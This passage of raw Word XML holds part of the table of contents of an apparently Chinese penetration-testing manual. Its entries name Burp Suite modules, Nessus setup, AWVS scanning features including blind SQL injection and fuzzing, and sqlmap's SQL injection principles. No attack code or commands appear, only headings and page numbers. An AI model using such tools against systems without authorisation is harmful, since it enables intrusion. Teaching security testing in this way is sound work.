              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</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5" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Sequencer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884695 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</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6" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Decoder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884696 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>86</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697" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Compare</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884697 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</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698" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nessus漏洞扫工具</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884698 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</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699" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Nessus概述</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884699 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</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00" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装Nessus工具</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884700 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</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01" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>激活Nessus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884701 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</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02" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>配置nessus</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884702 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</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03" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AWVS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884703 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</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04" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>概述</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884704 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</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05" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Web Scanner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884705 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>106</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06" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>site crawler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884706 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>111</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07" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>target finder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884707 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>112</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08" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Subdomain Scanner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884708 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>112</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09" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Blind SQL Injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884709 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>112</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10" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>HTTP Editor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884710 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>113</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11" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>HTTP Sniffer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884711 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>114</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12" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>HTTP Fuzzer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884712 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>115</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13" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sqlmap工具解析</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884713 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</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14" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sql注入攻击原理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884714 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</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15" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
